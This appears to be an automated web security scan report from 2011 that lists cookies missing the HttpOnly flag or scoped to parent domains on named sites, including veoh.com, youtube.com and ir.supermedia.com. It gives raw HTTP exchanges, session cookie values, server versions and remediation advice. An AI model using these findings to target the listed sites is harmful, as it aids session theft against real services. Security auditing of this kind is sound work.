Keep-Alive: timeout=5, max=18
Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=53
Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.wix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?hl=en&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /x22 HTTP/1.1
Host: abcconstructioninc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: advertise.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: comcast.usdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:10 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=3c6d8370b754a2d4c61e45b8e079762f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18497
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Comcast Cable Deals | Comcast High Speed Internet & Cable TV Promotions</title> <meta name="keywords" content=" ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /category.jspa?categoryID=267 HTTP/1.1
Host: discussions.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Apple - Support - Discussions - iPad</title> <meta htt ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: ir.supermedia.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762069|check#true#1296760269; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:09:40 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NOMOBILE=0;path=/
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:09:40 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:09:40 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:09:40 GMT;path=/
Vary: Accept-Encoding
Content-Length: 17691
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /InvestorKit.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A22%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:22 GMT;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /common/mobile/?CompanyID=VERIZONINFO HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:37:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A37%3A15%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:15 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:15 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:37:15 GMT;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactus.cfm HTTP/1.1
Host: ir.supermedia.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NOMOBILE=0; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; mbox=session#1296759528614-838261#1296763633|check#true#1296761833; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:57 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:57 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:57 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:57 GMT;path=/
Vary: Accept-Encoding
Content-Length: 21608
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /disclaimer.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A00%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:00 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:00 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:00 GMT;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /downloads.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A22%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:22 GMT;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /eventdetail.cfm?EventID=92127 HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A17%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:17 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:17 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:17 GMT;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /events.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:37:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A37%3A18%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:19 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:19 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:37:19 GMT;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /faq.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A02%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:02 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:02 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:02 GMT;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:35:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A35%3A59%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:35:59 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:35:59 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:35:59 GMT;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /releasedetail.cfm?ReleaseID=546698 HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A06%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:06 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:06 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:06 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /releases.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A07%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:07 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:07 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:07 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
